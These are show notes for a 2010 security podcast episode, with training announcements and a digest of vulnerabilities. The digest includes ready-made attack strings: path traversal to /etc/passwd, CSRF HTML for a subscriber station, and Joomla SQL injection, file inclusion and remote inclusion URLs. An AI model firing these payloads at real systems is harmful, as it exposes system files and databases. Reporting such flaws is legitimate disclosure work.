Episode 95 – OuterZone Review

ISD Podcast Episode 95 for March 25, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

• Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

April 15th – 18th, 2010 Cleveland, Ohio
http://notacon.org/
Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class
May 8, 2010 Jeffersonville,  Indiana

(No URL for that as of yet)
Proceeds with be going to the Hackers for Charity Food For Work Program
Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. uhttp Server is subject to a Path Traversal vulnerability. Version 0.1.0-alpha is affected, though others may be as well.  The problem is in the management of the bad chars that can be used to launch some attacks, such as the directory traversal. The path traversal sequence (‘../’) is not checked, so it can be used for seeking the directories of the affected system.  Example URL is available: http://www.sample.com/GET /../../../../../../etc/passwd HTTP/1.1
2. Harris Stratex 2100 subscriber station is subject to a Cross Site Request Forgery vulnerability.  This vulnerability would allow an attacker to view the running configuration without authentication.  Version 3.0.4.1.7.C is impacted.  Example HTML code is available:
   <html>
   <body>
   <body xonload=”config.submit();”>
   <form method=”get”
   action=”http:192.168.1.1/frameCmd6.html”>
   <input value=”Current
   Configuration”>
   </form>
   </body>
   </html>
3. The Joomla Component com_gds is subject to a SQL Injection vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_gds&task=store&Storeid=-1+UNION+SELECT+1,2,3,4,5,6–
4. The Joomla Component com_cx is subject to a SQL Injection vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_cx&task=postview&postid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41–
5. The Joomla Component J!Research is subject to a Local File Inclusion (LFI) vulnerability.  This could be exploited by an attacker to expose sensitive data.  Example URL is available: http://www.sample.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00
6. The Joomla Component com_cb is subject to a SQL Injection vulnerability because it fails to santize user supplied inputs used in a SQL query.  Example URL is available: http://www.sample.com/index.php?option=com_cb&task=list&cat=-1+UNION+SELECT+1,2,3,4,5–.
7. The Joomla Component SMEStorage is subject to a Local File Inclusion (LFI) vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_smestorage&controller=[LFI]%00
8. The Joomla Component com_jwmmxtd is subject to a Remote File Inclusion (RFI) vulnerability.  Example URL is available: http://www.sample.com/administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= [inj3ct0r]

OuterZone Review

http://dc949.org/projects/floodgate/

All works represented here are compiled from various sources (email, IRC, forums, and original author/websites). If the original work is copyrighted it is presented under the fair use of a copyrighted work, Copyright Act of 1976, 17 U.S.C. § 107, for purposes of criticism, comment, news reporting, teaching, and research. No use is directly intended as an infringement of copyright. Attribution is always given to the original source, if known. To have any copyrighted material removed, please contact isdpodcast[at]isdpodcast[dot]com.